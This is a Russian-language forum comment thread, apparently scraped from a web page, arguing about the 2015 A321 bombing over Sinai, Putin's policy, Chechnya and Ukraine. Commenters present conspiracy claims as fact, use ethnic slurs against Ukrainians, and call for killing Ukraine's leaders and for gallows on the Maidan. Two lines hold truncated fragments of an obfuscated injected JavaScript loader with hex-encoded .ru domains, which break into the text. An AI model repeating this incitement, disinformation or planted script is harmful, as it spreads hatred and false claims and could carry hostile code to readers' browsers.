Чахлику. Достаточно ли принято мер по выходу из "мировой финансовой системы"? Вывоз нефти, нефтепродуктов, ЕМНИП газа, металлов из-за падения рубля увеличился. Насчет блестящей победы. Уже писал. Для этого нужны соответствующие руководители. С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275"
В любой болезни главное установить точный диагноз
Если, конечно, ты собрался лечиться... Чего наш народ желает - вот главная проблема. Считать самих себя людьми второго сорта и следить за курсом доллара и евро - это как? Собакам-же - собачья смерть (и тут всё справедливо)
Чахлику. Кроме диагноза
Чахлику. Кроме диагноза важно еще и правильное лечение, крепость тела и чтобы болезнь не была слишком запущена. Только и всего. С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse
ЧАХЛОМУ
Какая история? У НИХ своя история, у нас своя. Они предлагают плакать и ужасаться отрезанным игиловцами головам, и прочие трупоедские ужасы подсосывают услужливо со всех новостных порталов. А вот про МИЛЛИОНЫ сгинувших наших соотечественников, от наркоты и бомжевания, все молчат глухо.Их как бы не было... вот такая вот история...:-)))
Путин...купился...да разводилово это низкопробное, балаган дешёвый. История...ага щас...
Вот кто страшней, игил или "делатели" демократических реформ? По моему, исходя из масштабов содеянного, ответ очевиден.
Владимир136
Франция - кстати?
И Франция подвернулась - как нельзя "кстати".
Очень верное замечание. И заметьте, все как всегда кстати - взрывы в Волгодонске, Бунакске и Москве обеспечили общественное мнение для ввода войск в Чечню, 911 кстати подготовило почву для нападения на Афганинистан и Ирак, теракты в Париже кстати делают из нерукопожатного диктатора-агресора путина вполне себе полезного человека, бомбящего террористов... Будь я каким-нибудь конспирологом, типа Мухина или Литвиненко, черт знает какие мысли могли бы в голову придти...
Взрывы в Волгодонске, Буйнакске и в Москве - не кстати как раз
Во всяком случае для России и лично для Путина... Можно подумать, что ввели войска в Чечню использовав именно этот предлог. Но что действительно происходило тогда в Чечне - замалчивается по сию пору и какой либо "предлог" был совершенно излишен. А если называть вещи их собственными именами, то на территории Чечни был сформирован террористический анклав - управляемый и финансируемый спецслужбами США апосредованно ближневосточными "шестёрками" - Саудовской Аравией, Кайтаром и рядом других нефтеносных арабских государств. Нечто подобное, между прочим, американцам удалось проделать и с Украиной - под покровительством европейских "шестёрок", а принявших сторону украинских законов Крым и Донбасс (посмевших перечить обнаглевшим бандитам) - объявили "террористическими мятежниками" и тепрерь используют эту ситуацию ровно до-наоборот тому - как реагировал кремль на террористический мятеж в Чечне. У России сегодня достаточно оснований для того - чтобы попросту "мочить в сортирах" всю нынешнюю украинскую "царствующую элиту" и исполнить это чисто-технически вовсе не составит для России особого труда (достаточно просто начать и сами "украинцы" доведут это дело до логического конца - с виселицами на майдане для "хероев АТО")... Но, думаю, что Россия всё-же ждёт подходящего предлога в глазах "Запада" и скорее всего скоро его дождётся. Но по моему мнению на "Запад" вообще не следует обращать внимание когда речь идёт о жизненно-важных интересах России на исконно- русских землях
Не будьте идиотом
То, что творится в Чечне сейчас лучше? По мне, пусть бы и оставался там Масхадов, уж гораздо меньший беспредельщик, чем герой России, убивший первого русского в 16 лет... Да и бюджетных денег независимая Чечня столько бы не получала. Про Крым и Лугандонию не надо брехать. Что за референдум, организованный за 2 недели под дулами автоматов, все понимают. И про террористов, захвативших отделения милиции в Донецке и Луганске, мы тоже все знаем. Кстати, вы правда верите, что власть на Украине отождествляется лишь с президентом, а парламент при сбежавшем презике уже нелегитимен? Насчёт интересов России поподробнее можно? Я считал, что интересы России - это интересы её жителей. Если в результате действий руководства снижаются доходы и растут цены, разве в интересах России такие действия? И что за "исконно русские" территории, которые РИ захватила лишь в конце 18 века?
Таки что вы получается, по
Таки что вы получается, по вашей логике..
Что самолет взорвали не куклы, а кукловоды - чтобы Россия не мешалась в Сирии?
Но понятно, сдашь Асада... и сам того гляди станешь "Милошеуич ес кроуауый диктейтэ! его надо останоуить!"
Вспомнилась древняя дискуссия п о Югославии на тогда демолиберальном ТВ в 90-х.
Схема то работает! Объявят тебя "кроуаы диктейтэ"
И как писали уже в 00-х:. поставят ираком и отсербят по самый афганистан,
+ еще и отливят/заебиптят как в 10-х... Неужто в Сирии нашла коса на Иран и Россию или будет как было
Политика - искусство
Политика - искусство ВОЗМОЖНОГО!
- до чего смогли - до того и договорились.
А репетиция бомбардировки стратегической авиацией
некоего среднеазиатского гада тоже чего-то стоит.
"Коммерсантъ" узнал
"Коммерсантъ" узнал предварительные выводы следствия о взрыве на A321
05:33, 18 ноября 2015
Взрыв на борту российского пассажирского самолета, упавшего вскоре после вылета из египетского Шарм-эль-Шейха 31 октября, произошел, предположительно, в салоне. Об этом пишет "Коммерсантъ" со ссылкой на источник, близкий к следствию.
Эпицентр взрыва мог находиться в конце салона, где располагаются хвостовые шпангоуты. По предварительной версии, бомба могла быть заложена под пассажирское сиденье у окна. Ее срабатывание привело к разрушению шпангоута и взрывной разгерметизации салона.
Самолет, от которого сразу же оторвалась хвостовая часть, развалился в воздухе, а люди, находившиеся на его борту, погибли практически мгновенно от резкого перепада давления.
По данным издания, эксперты ФСБ, обследуя обломки A321, обнаружили часть фюзеляжа с пробоиной в обшивке диаметром примерно метр на метр, края которой были выгнуты наружу. Образоваться она могла в результате применения взрывчатого вещества высокой бризантности, изготовленного в заводских условиях. Такие вещества, например тротил или пластит, используются обычно в военных целях. Какая именно взрывчатка сработала, пока не уточняется.
Взрывное устройство, предположительно, имело часовой механизм, хотя в случае задержки с вылетом, что не является редкостью для египетских аэропортов, таймер мог сработать и в самолете без пассажиров еще на летном поле. Если бы бомба находилась, например, в хвостовой, негерметичной части самолета, активировать ее мог датчик давления - при наборе высоты оно падает.
По предположению экспертов, бомбу на борт мог занести кто-то из сотрудников обслуживающего персонала аэропорта - например, уборщики салона или рабочие, доставлявшие еду и багаж.
Лично мне нравится версия с бомбой на борту
Однако в свете последних событий появились сомнения.
Во-1-х, голословное сообщение о докладе директора ФСБ президенту с окончательным вердиктом: "Теракт". "Коммерсантъ" со своими подробностями опирается на свой неофициальный источник.
Во-2-х, приказ на безусловное мочилово: "Президент поручил нашим специальным службам принять меры для установления всех, кто причастен к организации этого чудовищного террористического акта; он приказал искать этих людей по всему миру вне зависимости от географии без какого-либо срока давности и уничтожить всех этих людей", - дополнил слова президента официальный представитель Кремля Дмитрий Песков. http://lenta.ru/articles/2015/11/17/licensetokill/
Дело пахнет Норд-Остом-2, когда террористов уничтожили при 100% возможности взять в плен и выпытать все подробности и связи.
Похоже на заметание каких-то следов, ну и плюс - грубый пиар в расчёте на вопли толпы: "Распните их! Распните!"
Кучма Николай
И смотрите как резко возросла интенсивность бомбёжек. Уже и стратегическую авиацию в дело ввели! Ату их! Оно может и ату их...вот только ...в Донбассе русских продолжают убивать... но трогать их низя...титульная нация в правительстве, а арабов...мочи их Россия...тут можно...
И все за наш счет... эх и крутят
...таки и построят они новую Хазарию со столицей в Днепропетровске.
Воякам понятное дело пострелять по настоящему хочется...но про Украину замазывают тему. Старательно. По всем СМИ в последнее пошли темы про то что хохлы уже сплошные фашисты... подливают керосинчику в костерок.
Нет, не наше это правительство. Втягивают они нас в войнушку. Причем грамотно.
Владимир136
Владимир136
То, что возросла интенсивность бомбёжек и задействовали стратегическую авиацию, - это естественно и логично. Только вот где-то на соседней ветке я видел сравнение: французы взяли сколько-то террористов живьём, а в РФ такого не наблюдается. Опять подтверждение моего подозрения: во Франции стараются найти сообщников и вскрыть структуру, а в РФ - нет.
Новороссию ожидаемо сливают. Вот свежие сообщения:
Кого любит [власовская] Россия...
http://za-kaddafi.org/node/40302#comment-91901
Сил уже больше нет Завидуем сирийцам Их освобождают...
http://za-kaddafi.org/node/40302#comment-91900
Документы одобрили, однако заявление не приняли...Мы в шоке...
http://za-kaddafi.org/node/40302#comment-91893
Наверное кремлю нужна вся Украина
И "Новороссия" в этом расскладе лишь тот "камень" - на который нашла "коса" американского плана по захвату Украины. Кремль-же с предвкушением наблюдает как Украина стремительно нищает и разваливается - не в силах одолеть Новороссии и поправить дела в экономике (а взять такое большое население на прокорм и полное обеспечение - Евросоюз тоже не в состоянии). Пукин-же просто демонстративно "стебается" - соглашаясь на реструкторизацию "суверенного российского долга" на ещё лучших условиях - чем требует Киев, но под финансовые гарантии "це Эвропы"... Одним словом кремль попросту выжидает - когда майдауны доведут страну до ручки и предпримут "психические атаки" на Донбасс, т.к. в области экономики правительству Порошенко-Вальцмана и вовсе ничего не светит (тогда жадность хохлов одолеет наконец и они сами его сожрут без "сала" - с божьей помощью России))))) Всплеск-же террора в Европе скорее нужен США и Евросоюзу - с целью ввязаться в войну с ИГИЛ и тем самым взять его "умеренную оппозицию" под защиту, ограничив напор России (и может именно поэтому Россия так засуетилась тоже - "обеспокоившись за Францию" и резко признала причинами крушения российско авиалайнера на Синае - теракт со стороны ИГИЛ, не желая в начале эту версию рассматривать в качестве основной). Тут конечно многое не ясно и возможно российский А-321 действительно взорвали террористы. Но сами теракты не всегда им удаются, а если "заказ" на него поступил срочный, то и вероятность "осечки" резко увеличивается тоже... Одним словом, могли сработать и "на-верняка" - попросту сбив пассажирский российский самолёт и первыми начать трезвонить о теракте... Многие эксперты - побывавшие на месте падения обломков, указывают на "внешнее воздействие" и также очень подозрительно, что о военных учениях ВВС "США-Израиля-Польши и Греции" - проходивших в непосредственной близости от места падения обломков и именно в то самое время, мировые СМИ скромно умолчали
ЮИ
"... довольно популярную в своё время лирическую песню со словами: «Пропел гудок заводской конец рабочего дня»,..."
Возможно, более известной была песня "А все же жаль, что я давно, гудка не слышал, заводского...".
Гость Валерий
Самой известной была песня "Нас утро встречает прохладой".
"Кудрявая, чтож ты не рада веселому пенью ГУДКА"
про гудок
красивой традицией, к сожалению, быстро закончившейся
Не, а наш Вагонный, ещё гудит!!!.
Зуб на Зуб , не Попа даёт.
Отправить комментарий